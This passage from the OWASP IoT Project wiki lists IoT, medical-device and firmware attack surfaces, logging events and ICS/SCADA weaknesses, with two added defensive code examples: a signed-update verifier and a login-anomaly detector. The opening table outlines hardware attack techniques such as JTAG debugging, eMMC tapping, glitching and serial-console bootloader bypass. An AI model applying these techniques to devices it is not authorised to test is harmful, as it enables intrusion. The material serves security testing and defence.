* A service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|}<br />
<br />
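The Update Mechanism rows above (updates not signed, update sent without encryption, update location writable) and the Device Firmware row "Firmware downgrade possibility" describe what a device-side update verifier must reject. The following is an added example, not code from the OWASP IoT Project, showing the three checks a verifier performs on a signed manifest: vendor signature, anti-rollback version, and image hash. The manifest layout, the Ed25519 key pair and the firmware bytes are all constructed for this example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
	"sort"
)

// Manifest is the small, fixed-layout record the vendor signs: the firmware
// version (for anti-rollback) and the SHA-256 of the image it authorises.
// The layout is constructed for this example and is not any vendor's format.
type Manifest struct {
	Version  uint32
	ImageSHA [32]byte
}

// Bytes serialises the manifest deterministically so that signer and
// verifier hash exactly the same bytes.
func (m Manifest) Bytes() []byte {
	buf := make([]byte, 4+32)
	binary.BigEndian.PutUint32(buf[:4], m.Version)
	copy(buf[4:], m.ImageSHA[:])
	return buf
}

var (
	ErrBadSignature = errors.New("update: manifest signature invalid")
	ErrRollback     = errors.New("update: version not newer than installed")
	ErrImageHash    = errors.New("update: image hash does not match manifest")
)

// SignManifest is the build-server side; the private key never ships on the device.
func SignManifest(priv ed25519.PrivateKey, m Manifest) []byte {
	return ed25519.Sign(priv, m.Bytes())
}

// VerifyUpdate is the device side. Order matters: the signature is checked
// first so that nothing in an unauthenticated manifest (not even the version
// field) influences a decision; then the version must be strictly newer than
// the installed one (anti-rollback); then the delivered image must match the
// hash the signed manifest commits to. The check runs over the bytes held in
// memory, so a world-writable staging directory cannot swap the image after
// verification as long as the caller flashes these same bytes.
func VerifyUpdate(vendorKey ed25519.PublicKey, installed uint32, m Manifest, sig, image []byte) error {
	if !ed25519.Verify(vendorKey, m.Bytes(), sig) {
		return ErrBadSignature
	}
	if m.Version <= installed {
		return ErrRollback
	}
	if sha256.Sum256(image) != m.ImageSHA {
		return ErrImageHash
	}
	return nil
}

// RunScenarios uses a constructed vendor key pair and a constructed image to
// exercise the happy path and three failure modes from the tables above.
func RunScenarios() map[string]error {
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	image := []byte("constructed firmware image v2 (not a real image)")
	good := Manifest{Version: 2, ImageSHA: sha256.Sum256(image)}
	installed := uint32(1)

	out := map[string]error{}
	out["valid update"] = VerifyUpdate(vendorPub, installed, good, SignManifest(vendorPriv, good), image)

	// "Updates not signed" by the vendor: a manifest signed with some other key.
	_, otherPriv, _ := ed25519.GenerateKey(rand.Reader)
	out["forged signature"] = VerifyUpdate(vendorPub, installed, good, SignManifest(otherPriv, good), image)

	// "Firmware downgrade possibility": a genuine, vendor-signed but older release.
	old := Manifest{Version: 1, ImageSHA: sha256.Sum256(image)}
	out["rollback"] = VerifyUpdate(vendorPub, installed, old, SignManifest(vendorPriv, old), image)

	// "Lack of payload verification": image bytes altered after the manifest was signed.
	tampered := append([]byte(nil), image...)
	tampered[0] ^= 0xff
	out["tampered image"] = VerifyUpdate(vendorPub, installed, good, SignManifest(vendorPriv, good), tampered)
	return out
}

func main() {
	results := RunScenarios()
	names := make([]string, 0, len(results))
	for n := range results {
		names = append(names, n)
	}
	sort.Strings(names)
	for _, n := range names {
		fmt.Printf("%-17s -> %v\n", n, results[n])
	}
}
```

Transport encryption (TLS) for the download is still needed for confidentiality and to keep an attacker from observing or replaying the update, but it does not replace the signature: the device must verify the vendor's signature regardless of the channel it received the image over.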
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum set of logging events for IoT devices. It covers many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
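An added example, not part of the OWASP draft, of how a device or collector could derive four of the events listed above (Multiple Failed Passwords, High Rate of Login Attempts, Device Accessed Using Default Administrative Credentials, Source Location Changes During Session) from raw authentication and session records. The log line format, its field names (`user`, `src`, `result`, `sid`, `default_cred`) and the alert thresholds are constructed assumptions for this illustration.<br />

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample device log (not captured from any real device), one record per line.
# Field names and the default_cred flag are assumptions made for this example.
SAMPLE_LOG = """\
2019-11-01T07:00:01Z auth user=admin src=10.0.0.5 result=FAIL
2019-11-01T07:00:02Z auth user=admin src=10.0.0.5 result=FAIL
2019-11-01T07:00:03Z auth user=admin src=10.0.0.5 result=FAIL
2019-11-01T07:00:04Z auth user=admin src=10.0.0.5 result=FAIL
2019-11-01T07:00:05Z auth user=admin src=10.0.0.5 result=FAIL
2019-11-01T07:00:06Z auth user=admin src=10.0.0.5 result=OK default_cred=yes
2019-11-01T07:00:10Z session sid=abc123 src=10.0.0.5 action=get_config
2019-11-01T07:00:20Z session sid=abc123 src=203.0.113.9 action=set_config
2019-11-01T07:05:00Z auth user=alice src=192.168.1.20 result=OK
"""

# Thresholds are assumptions for the example; the OWASP draft names the events, not the limits.
FAILED_PASSWORD_THRESHOLD = 3        # failed logins for one account before alerting
RATE_WINDOW = timedelta(seconds=10)  # window for "High Rate of Login Attempts"
RATE_THRESHOLD = 5                   # login attempts from one source within the window

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<kind>auth|session) (?P<fields>.*)$")


def parse_line(line):
    """Split one log line into (timestamp, kind, {field: value}); None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    fields = dict(kv.split("=", 1) for kv in m.group("fields").split())
    return ts, m.group("kind"), fields


def detect_events(log_text):
    """Return (timestamp, category, event, detail) tuples for the OWASP IoT logging
    events that can be derived from authentication and session records."""
    events = []
    failures = defaultdict(int)    # user -> consecutive failed logins
    attempts = defaultdict(deque)  # src  -> timestamps of recent login attempts
    session_src = {}               # sid  -> source address the session started from

    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue  # malformed record: skip rather than crash the detector
        ts, kind, f = parsed

        if kind == "auth":
            user, src, result = f["user"], f["src"], f["result"]

            # High Rate of Login Attempts: sliding window of attempts per source.
            window = attempts[src]
            window.append(ts)
            while ts - window[0] > RATE_WINDOW:
                window.popleft()
            if len(window) == RATE_THRESHOLD:
                events.append((ts, "Authentication Exceptions",
                               "High Rate of Login Attempts", f"src={src}"))

            if result == "FAIL":
                failures[user] += 1
                # Multiple Failed Passwords: alert once, when the threshold is reached.
                if failures[user] == FAILED_PASSWORD_THRESHOLD:
                    events.append((ts, "Authentication Exceptions",
                                   "Multiple Failed Passwords", f"user={user}"))
            else:
                failures[user] = 0
                # Administrative Mode Events: a successful login that the device
                # itself flagged as using the factory-default credential.
                if f.get("default_cred") == "yes":
                    events.append((ts, "Administrative Mode Events",
                                   "Device Accessed Using Default Administrative Credentials",
                                   f"user={user} src={src}"))

        elif kind == "session":
            sid, src = f["sid"], f["src"]
            first = session_src.setdefault(sid, src)
            # Session Exceptions: the same session id now arrives from another address.
            if src != first:
                events.append((ts, "Session Exceptions",
                               "Source Location Changes During Session",
                               f"sid={sid} {first}->{src}"))
    return events


if __name__ == "__main__":
    for ts, category, event, detail in detect_events(SAMPLE_LOG):
        print(f"{ts.isoformat()} [{category}] {event} ({detail})")
```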
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program around IoT devices, and companies that want to build one have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|OWASP Internet of Things Project]]<br />
<br />
For more information on getting started, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
To address mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
